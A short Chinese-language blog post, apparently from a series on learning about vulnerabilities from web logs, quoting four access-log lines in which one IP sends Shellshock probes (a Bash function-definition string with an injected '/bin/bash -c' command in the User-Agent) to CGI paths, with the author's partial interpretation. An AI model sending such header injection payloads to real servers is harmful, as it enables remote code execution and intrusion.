2020年1月7日 星期二

從 Web Log 學習系統漏洞 55

weblog 中出現這幾段記錄:
5.178.87.50 - - [07/Jan/2020:13:56:41 +0800] "GET // HTTP/1.1" 404 1833 "-" "() { :;};echo; /bin/bash -c \" echo 2014 | md5sum\""
5.178.87.50 - - [07/Jan/2020:13:56:41 +0800] "GET //cgi-sys/realsignup.cgi HTTP/1.1" 404 220 "-" "() { :;};echo; /bin/bash -c \" echo 2014 | md5sum\""
5.178.87.50 - - [07/Jan/2020:13:56:42 +0800] "GET //cgi-bin/test-cgi HTTP/1.1" 403 225 "-" "() { :;};echo; /bin/bash -c \" echo 2014 | md5sum\""
5.178.87.50 - - [07/Jan/2020:13:56:42 +0800] "GET //cgi-bin/test.cgi HTTP/1.1" 403 225 "-" "() { :;};echo; /bin/bash -c \" echo 2014 | md5sum\""
估狗之後發現這是一種針對 CGI 來做 Bash 遠端代碼執行漏洞

看它的攻擊方式是將指令寫在 User-Agent 中, 之前好像也有遇過類似的攻擊方式

() { :;};  這東西不曉得什麼意思
然後 echo 呼叫 /bin/bash
後面 echo 呼叫 2014 不曉得什麼意思
最後使用 md5sum 產生 dm5 查證碼

整段來看實在不曉得他想幹嘛, 不過網路上看到搭配一些程式碼能叫出系統環境值或是帳號檔內容

沒有留言:

張貼留言